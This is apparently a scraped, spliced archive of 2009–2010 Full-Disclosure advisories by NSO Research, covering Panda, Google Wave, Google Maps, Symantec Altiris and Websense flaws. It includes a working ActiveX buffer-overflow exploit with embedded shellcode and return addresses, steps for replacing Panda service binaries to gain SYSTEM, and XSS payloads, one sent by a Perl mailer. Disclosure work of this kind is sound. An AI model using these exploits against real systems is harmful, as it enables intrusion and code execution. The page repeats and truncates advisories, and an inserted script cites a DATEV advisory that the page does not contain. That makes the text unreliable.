Nov 02 2009 Maxim:  http://www.securityfocus.com/bid/36897

The earlier reported vulnerabilities only affected the home user
products, but the business products had the same bug.

More interesting is that since 2006 Panda has, year after year, released
the new version with the same old bug.



Description:


1. 32Bit Version of Panda Security for Desktops/File Servers
+---

During installation of Panda Security for Desktops/File Servers the
permissions for the installation folder

%ProgramFiles%\Panda Software\AVTC\

are by default set to Everyone:Full Control. A few services
(e.g. PAVSRV51.EXE) are started from this folder, and these services run
under the LocalSystem account.

The 32-bit version of Panda Security for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.

If the TruePrevent service (Panda TPSrv) is not running, the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which TPSrv is not started and
all service files can be manipulated.

This can be exploited by:

a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
   process
b. Rename PAVSRV51.exe to PAVSRV51.old in the Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot the trojaned application will be executed under the
LocalSystem account.

Executables started as services:
+--
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe


2. 64Bit Version of Panda Security for Desktops/File Servers

[Full-disclosure] NSOADV-2010-002: Google Wave Design Bugs

2010-01-19 Thread NSO Research
_
Security Advisory NSOADV-2010-002
_
_


  Title:  Google Wave Design Bugs
  Severity:   Low
  Advisory ID:NSOADV-2010-002
  Found Date: 16.11.2009
  Date Reported:  18.11.2009
  Release Date:   19.01.2010
  Author: Nikolas Sotiriu (lofi)
  Mail:   nso-research at sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2010-002.txt
  Vendor: Google (http://www.google.com/)
  Affected Products:  Google Wave Preview (Date: <= 14.01.2010)
  Not Affected Component: Google Wave Preview (Date: >= 14.01.2010)
  Remote Exploitable: Yes
  Local Exploitable:  No
  Patch Status:   partially patched
  Discovered by:  Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:  Thierry Zoller: For the permission to use his
  Policy



Background:
===

Google Wave is an online tool for real-time communication and
collaboration. A wave can be both a conversation and a document where
people can discuss and work together using richly formatted text,
photos, videos, maps, and more.

(Product description from Google Website)



Description:


All these possible attacks are the result of playing 4 hours with Google
Wave. I didn't check all the funny stuff which is possible with the Wave.



1. Gadget phishing attack:
--

The Google Wave Gadget API can be used for phishing attacks.

An attacker can build his own phishing gadget, share it with his Google
Wave contacts and hopefully get the login credentials from a user.

This behavior is normal. The problem is that this bug makes it easier
to steal logins.


2. Virus spreading attack:
--

Uploaded files are not scanned for malicious code.

An attacker could upload his malware to a wave and share it with his
Google Wave contacts.



Proof of Concept :
==

A proof of concept gadget can be found here:
http://sotiriu.de/demos/phgadget.xml



Solution:
=

1. No changes made here.
   Workaround: Don't trust Waves.

2. Google builds in AV scanning.



Disclosure Timeline (YYYY/MM/DD):
=

2009.11.16: Vulnerability found
2009.11.17: Sent PoC, advisory, disclosure policy and planned disclosure
date (2009.12.03) to the vendor
2009.11.23: Vendor response
2009.12.01: Ask for a status update, because the planned release date is
2009.12.03.
2009.12.03: Google Security Team asks for 2 more weeks to patch.
2009.12.03: Changed release date to 2009.12.17.
2009.12.15: Ask for a status update, because the planned release date is
2009.12.17. => No response
2009.12.21: Ask for a status update.
2009.12.29: Google Security Team informs me that there will be no changes
made before 2010.01.03.
2010.01.14: Google Security Team informs me that uploaded files will now
be scanned for malware. Google Gadgets will not be updated.
2010.01.19: Release of this advisory












___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Google Maps XSS (currently unpatched)

2010-01-12 Thread NSO Research
Looks like a really quick fix from Google.

Directly after I got the PoC it worked. Now it doesn't.



On 12.01.2010 13:58, Michael Lenz wrote:
> Your PoC generates:
>
>
> *Google*
> Sorry...
>
>
>   We're sorry...
>
> ... but your computer or network may be sending automated queries. To
> protect our users, we can't process your request right now.
>
> See Google Help
> http://www.google.com/support/bin/answer.py?answer=86640 for more
> information.
>
> © 2009 Google - Google Home http://www.google.com
>
>
> So..?
>
> gaurav baruah wrote:
> > Google Maps XSS (currently unpatched)
> >
> > Discovered By -
> > Pratul Agrawal (pratu...@gmail.com)
> > Gaurav Baruah  (baruah.gau...@gmail.com)
> >
> >
> > PoC -
> > http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=%3Cscript%3Ealert(%22Google%20Sucks%20!%22)%3C/script%3E&vps=1&sll=28.613554,77.20906&sspn=0.009136,0.013797&ie=UTF8
 


[Full-disclosure] NSOADV-2010-001: Panda Security Local Privilege Escalation

2010-01-09 Thread NSO Research
_
Security Advisory NSOADV-2010-001
_
_


  Title:  Panda Security Local Privilege Escalation
  Severity:   Medium
  Advisory ID:NSOADV-2010-001
  Found Date: 02.2008
  Date Reported:  30.11.2009
  Release Date:   09.01.2010
  Author: Nikolas Sotiriu (lofi)
  Mail:   nso-research at sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2010-001.txt
  Vendor: Panda Security (http://www.pandasecurity.com/)
  Affected Products:  (Self tested)
  -Panda Security for Business 4.04.10
  -Panda Security for Business with Exchange
   4.04.10
  -Panda Security for Enterprise 4.04.10
  -Panda Internet Security 2010 (15.01.00)
  -Panda Global Protection 2010 (3.01.00)
  -Panda Antivirus Pro 2010 (9.01.00)
  -Panda Antivirus for Netbooks (9.01.00)

  (Provided by Panda)
  -Panda Global Protection 2009
  -Panda Internet Security 2009
  -Panda Antivirus Pro 2009
  -Panda Internet Security 2008
  -Panda Antivirus + Firewall 2008
  -Panda Platinum 2007 Internet Security
  -Panda Platinum 2006 Internet Security

  Affected Component: Corporate Products:
  -Panda Security for Desktops 4.05.10
  -Panda Security for File Servers 8.04.10

  Remote Exploitable: No
  Local Exploitable:  Yes
  Patch Status:   Vendor released a patch (See Solution)
  Discovered by:  Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:  Thierry Zoller: For the permission to use his
  Policy



Background:
===

Panda Security for Product is the security solution for companies that
need to protect their networks, mainly workstations and file servers.
Panda Security for Business is centrally managed thanks to the
AdminSecure Console, which allows monitoring the entire network,
protecting your critical assets against all types of threats and
optimizing productivity.

(Product description from Panda Website)

This vulnerability is similar to the following vulnerabilities in Panda
products, which were discovered earlier:

Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891
Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186
Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615
Nov 02 2009 Maxim:  http://www.securityfocus.com/bid/36897

The earlier reported vulnerabilities only affected the home user
products, but the business products had the same bug.

More interesting is that since 2006 Panda has, year after year, released
the new version with the same old bug.



Description:


1. 32Bit Version of Panda Security for Desktops/File Servers
+---

During installation of Panda Security for Desktops/File Servers the
permissions for the installation folder

%ProgramFiles%\Panda Software\AVTC\

are by default set to Everyone:Full Control. A few services
(e.g. PAVSRV51.EXE) are started from this folder, and these services run
under the LocalSystem account.

The 32-bit version of Panda Security for Desktops/File Servers
installs the TruePrevent package by default, which protects the files
in the installation directory from manipulation.

If the TruePrevent service (Panda TPSrv) is not running, the files are
completely unprotected.

A normal user is not able to stop the service, but normally he can boot
his workstation in SafeBoot mode, in which TPSrv is not started and
all service files can be manipulated.

This can be exploited by:

a. Boot the PC in SafeBoot mode, by pressing F8 during the boot
   process
b. Rename PAVSRV51.exe to PAVSRV51.old in the Panda folder
c. Copy any application to PAVSRV51.exe
d. Reboot

Upon reboot the trojaned application will be executed under the
LocalSystem account.

Executables started as services:
+--
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only)
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe
%ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe
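
As an added example (my code, not Panda's and not part of the advisory, which appears twice in this thread as NSOADV-2010-001 and its update), the following PowerShell audits every Windows service for the condition described above: a service binary, or the folder it lives in, that grants write access to Everyone, Users or other low-privileged principals while the service runs under an account such as LocalSystem. It assumes Windows with PowerShell 3 or later (Get-CimInstance); the function names are mine.

```powershell
# Added example: audit every Windows service for the weakness this advisory
# describes, a service binary (or its folder) that low-privileged principals
# can write to while the service itself runs as LocalSystem. Assumes Windows
# with PowerShell 3 or later (Get-CimInstance); function names are mine.

# Principals that should never hold write access on a service binary path
$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Specific rights that allow replacing or altering a file or folder content,
# plus the generic rights that inherited ACEs sometimes carry as raw numbers
$WriteMask    = [int][System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl'
$GenericWrite = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL

function Get-ServiceBinaryPath {
    # Strip quotes and arguments from an ImagePath such as "C:\x\svc.exe" -arg
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(\S+\.exe)') { return $Matches[1] }
    return ($PathName -split ' ')[0]
}

function Get-WeakAces {
    # Allow ACEs on $Path that grant a weak principal any form of write access
    param([Parameter(Mandatory)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if ($null -eq $acl) { return }
    $acl.Access | Where-Object {
        $rights = [int]$_.FileSystemRights
        $_.AccessControlType -eq 'Allow' -and
        $WeakPrincipals -contains $_.IdentityReference.Value -and
        ((($rights -band $WriteMask) -ne 0) -or (($rights -band $GenericWrite) -ne 0))
    }
}

function Find-WritableServiceBinaries {
    Get-CimInstance -ClassName Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        $svc = $_
        $exe = [Environment]::ExpandEnvironmentVariables((Get-ServiceBinaryPath -PathName $svc.PathName))
        if (-not (Test-Path -LiteralPath $exe)) { return }
        # Check the binary itself and the folder it lives in; a writable folder
        # is enough for the rename-and-replace the advisory describes
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            foreach ($ace in (Get-WeakAces -Path $target)) {
                [pscustomobject]@{
                    Service   = $svc.Name
                    RunsAs    = $svc.StartName
                    Path      = $target
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
}

Find-WritableServiceBinaries | Sort-Object Service, Path | Format-Table -AutoSize
```

On an affected installation the AVTC folder and the service binaries listed above show up with Principal "Everyone" and Rights "FullControl"; the fix is to remove that ACE and re-run the audit.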


2. 64Bit Version of Panda Security for Desktops/File Servers
+---

During  installation  of  Panda Security

[Full-disclosure] NSOADV-2009-001: Symantec ConsoleUtilities ActiveX Control buffer overflow

2009-11-02 Thread NSO Research
_
Security Advisory NSOADV-2009-001
_
_


  Title:  Symantec ConsoleUtilities ActiveX Control
  Buffer Overflow
  Severity:   Critical
  Advisory ID:NSOADV-2009-001
  Found Date: 09.09.2009
  Date Reported:  15.09.2009
  Release Date:   02.11.2009
  Author: Nikolas Sotiriu
  Mail:   nso-research at sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2009-001.txt
  Vendor: Symantec (http://www.symantec.com/)
  Affected Products:  Symantec Altiris Notification Server 6.x
  Symantec Management Platform 7.0.x
  Symantec Altiris Deployment Solution 6.9.x
  Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.1846
  Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000
  Remote Exploitable: Yes
  Local Exploitable:  No
  CVE-ID: CVE-2009-3031
  Patch Status:   Vendor released a patch
  Discovered by:  Nikolas Sotiriu
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:  Thierry Zoller: For the permission to use his
  Policy



Background:
===

Altiris service-oriented management solutions provide a modular and
future-proof approach to managing highly diverse and widely distributed
IT infrastructures. They are open solutions that enable lifecycle
integration of client, handheld, server, network and other IT assets
with audit-ready security and automated operation.

(Product description from Symantec Website)



Description:


On first access of the Management Website an ActiveX control
(AeXNSConsoleUtilities.dll) is installed, in which the function
BrowseAndSaveFile is vulnerable to a stack-based buffer overflow.

Name: ConsoleUtilities Class
Vendor:   Altiris, Inc.
Type: ActiveX-Steuerelement
Version:  6.0.0.1846
GUID: {B44D252D-98FC-4D5C-948C-BE868392A004}
File: AeXNSConsoleUtilities.dll
Folder:   C:\WINDOWS\system32
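
As an added example (my code, not vendor code and not part of the DATEV or Symantec advisories), the following PowerShell sets and verifies the Internet Explorer kill bit for the two CLSIDs given on this page, the DATEV DVBSExeCall.ocx control and the Altiris ConsoleUtilities control, so that the browser refuses to instantiate them while they remain installed. It assumes an elevated PowerShell session on Windows; the function names are mine.

```powershell
# Added example: set and verify the Internet Explorer ActiveX "kill bit" for the
# CLSIDs named in the DATEV and Symantec advisories on this page. A control whose
# CLSID carries Compatibility Flags 0x400 under the ActiveX Compatibility key is
# no longer instantiated by Internet Explorer, even though it stays installed.
# Assumes an elevated session (HKLM is written). Function names are mine.

$KillBitFlag = 0x400

# CLSIDs taken from the advisories on this page
$Clsids = @(
    '{C1CF8B56-3147-41A2-B9BF-79437EED7AFC}',   # DATEV DVBSExeCall.ocx
    '{B44D252D-98FC-4D5C-948C-BE868392A004}'    # Altiris AeXNSConsoleUtilities.dll
)

function Get-KillBitKeyPath {
    # Both registry views are returned on 64-bit Windows, because 32-bit
    # Internet Explorer reads the Wow6432Node mirror.
    param([Parameter(Mandatory)][string]$Clsid)
    $paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
    if ([Environment]::Is64BitOperatingSystem) {
        $paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    }
    return $paths
}

function Get-CompatibilityFlags {
    # Current DWORD value, or 0 when the key or value does not exist yet
    param([Parameter(Mandatory)][string]$KeyPath)
    $item = Get-ItemProperty -Path $KeyPath -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.'Compatibility Flags'
}

function Test-ActiveXKillBit {
    # True only when the kill bit is present in every applicable registry view
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($path in Get-KillBitKeyPath -Clsid $Clsid) {
        if (((Get-CompatibilityFlags -KeyPath $path) -band $KillBitFlag) -eq 0) { return $false }
    }
    return $true
}

function Set-ActiveXKillBit {
    # OR the kill bit into the existing value so other compatibility flags survive
    param([Parameter(Mandatory)][string]$Clsid)
    foreach ($path in Get-KillBitKeyPath -Clsid $Clsid) {
        if (-not (Test-Path -Path $path)) { New-Item -Path $path -Force | Out-Null }
        $flags = (Get-CompatibilityFlags -KeyPath $path) -bor $KillBitFlag
        Set-ItemProperty -Path $path -Name 'Compatibility Flags' -Value $flags -Type DWord
    }
}

foreach ($clsid in $Clsids) {
    Set-ActiveXKillBit -Clsid $clsid
    '{0}  kill bit set: {1}' -f $clsid, (Test-ActiveXKillBit -Clsid $clsid)
}
```

The kill bit is a browser-side stop-gap only; the controls still have to be updated or removed, since any other host that instantiates the CLSID is unaffected by it.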



Proof of Concept :
==

<html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'>
</object>
<script language='vbscript'>

Sub Submit_OnClick

   For i=0 to 2
      If document.ret.os(i).checked Then
         target=document.ret.os(i).value
      End If
   Next

   EIP=unescape(target)
   arg1 = ""
   arg3 = ""
   arg4 = ""
   arg5 = ""

   junk=String(310, "A") 'junk

   morejunk=String(18, unescape("%u0041")) 'more junk

   ' windows/exec - 224 bytes
   ' http://www.metasploit.com
   ' Encoder: x86/call4_dword_xor
   ' EXITFUNC=seh, CMD=calc.exe
   code=unescape("%uc92b%ue983%ue8ce%u%u%u5ec0%u7681%ue60e" & _
        "%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d" & _
        "%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f" & _
        "%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d" & _
        "%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c" & _
        "%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875" & _
        "%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981" & _
        "%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58" & _
        "%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe" & _
        "%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2" & _
        "%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d" & _
        "%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b" & _
        "%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a" & _
        "%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")

   buf=junk+EIP+morejunk+break+code

   obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>

<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>

<h3>Some RET Infos:</h3>
Overwrite EIP with  (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>

XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>

XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>

<form name=ret>
 <input type=radio name=os value=%u4141%u4141>
DoS<br>
 <input type=radio name=os value=%uaf0a%u77d5>
Windows XP SP2 German<br>
 <input type=radio name=os value=%u30D7%u7E68>
Windows XP SP3 German<br>
 <input type=button name=Submit VALUE=Exploit>
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>



Solution:
=

Symantec Security Advisory:
http://tinyurl.com/y9fakve

Hotfix (KB49568): Deployment Solution 6.9 SP3
https://kb.altiris.com/display

[Full-disclosure] NSOADV-2009-003: Websense Email Security Cross Site Scripting

2009-10-20 Thread NSO Research
_
Security Advisory NSOADV-2009-003
_
_


  Title:  Websense Email Security Cross Site Scripting
  Severity:   Low
  Advisory ID:NSOADV-2009-003
  Found Date: 28.09.2009
  Date Reported:  01.10.2009
  Release Date:   20.10.2009
  Author: Nikolas Sotiriu
  Mail:   nso-research (at) sotiriu.de
  URL:http://sotiriu.de/adv/NSOADV-2009-003.txt
  Vendor: Websense (http://www.websense.com/)
  Affected Products:  Websense Email Security v7.1
  Personal Email Manager v7.1
  Not Affected Products:  Websense Email Security v7.1 Hotfix 4
  Personal Email Manager v7.1 Hotfix 4
  Remote Exploitable: Yes
  Local Exploitable:  Yes
  Patch Status:   Patched with Hotfix 4
  Disclosure Policy:  http://sotiriu.de/policy.html
  Thanks to:  Thierry Zoller: for the permission to use his
  Policy



Background:
===

Websense Email Security software incorporates multiple layers of
real-time Web security and data security intelligence to provide
leading email protection from converged email and Web 2.0 threats.
It helps to manage outbound data leaks and compliance risk, and enables
a consolidated security strategy with the trusted leader in Essential
Information Protection.

(Product description from Websense Website)

The Websense Email Security Web Administrator is a web frontend that
gives access to message administration, directory management and the
log.



Description:


1. XSS in webfrontend:
--

The web frontend does not properly sanitize some variables before they
are returned to the user:

http://target:8181/web/msgList/viewmsg/actions/msgAnalyse.asp \
?Queue=Network%20Security&FileName=[XSS]&IsolatedMessageID=[XSS] \
&ServerName=[XSS]&Dictionary=[XSS]&Scoring=[XSS]&MessagePart=[XSS]

http://target:8181/web/msgList/viewmsg/actions/msgForwardToRis \
kFilter.asp?Queue=[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS] \
&ServerName=[XSS]

http://target:8181/web/msgList/viewmsg/viewHeaders.asp?Queue= \
[XSS]&FileName=[XSS]&IsolatedMessageID=[XSS]&ServerName=[XSS]

This can be exploited to execute arbitrary HTML and script code in a
user's browser session in the context of the Web Administrator frontend.


2. XSS in webfrontend through a Mail Subject:
-

The Subject of an email sent through the Websense Mail Security
server is not properly sanitized before it is shown in the Web
Administrator frontend.

Script code like <script>alert('X')</script> will be executed in
the user's browser in the context of the Web Administrator frontend.

The mail has to be held in a queue so that the code executes when the
administrator inspects it. A Subject like

VIAGRA<script>alert('XSS')</script>

will cause the message to be held in the Anti-Spam queue.



Proof of Concept :
==

#!/usr/bin/perl
# NSOADV-2009-003 PoC: send a mail whose Subject carries script code, so that
# it is held in the Anti-Spam queue and later rendered by the Web Administrator
# frontend. Usage: script.pl <smtp server> <recipient>
use strict;
use warnings;
use MIME::Lite;
use Net::SMTP;

my ($server, $rcpt);
(($server = $ARGV[0]) && ($rcpt = $ARGV[1])) || die "Usage: $0 <server> <Recipient>\n";

my $from_address = 'x...@mail.com';
my $to_address   = "<" . $rcpt . ">";
my $mail_host    = $server;

# Spam-like prefix so the message lands in the queue; the rest is the payload
my $subject      = 'VIAGRA XSS File <BODY ONLOAD=alert(\'XSS\')>';
my $message_body = "XSS Test File";

my $msg = MIME::Lite->new(
    From    => $from_address,
    To      => $to_address,
    Subject => $subject,
    Type    => 'multipart/mixed'
) or die "Error creating multipart container: $!\n";

$msg->attach(
    Type => 'TEXT',
    Data => $message_body
) or die "Error adding the text message part: $!\n";

# Deliver directly over SMTP to the Websense server under test
MIME::Lite->send('smtp', $mail_host, Timeout => 60);
$msg->send;



Solution:
=

Vendor released a patch.

http://tinyurl.com/yhe3hqa



Disclosure Timeline (YYYY/MM/DD):
=

2009.09.28: Vulnerability found
2009.10.01: Ask for a PGP key
2009.10.01: Websense sent their PGP key
2009.10.01: Sent PoC, advisory, disclosure policy and planned disclosure
date to the vendor
2009.10.08: Websense verifies the finding
2009.10.13: Websense fixed it. The patch will be available in version 7.2,
which will be released in ~2 weeks
2009.10.13: Ask for a list of affected versions/products and changed the
release date to 2009.10.29.
(no response)
2009.10.20: Found the KB article and the hotfix on the Websense website
2009.10.20: Release of this advisory








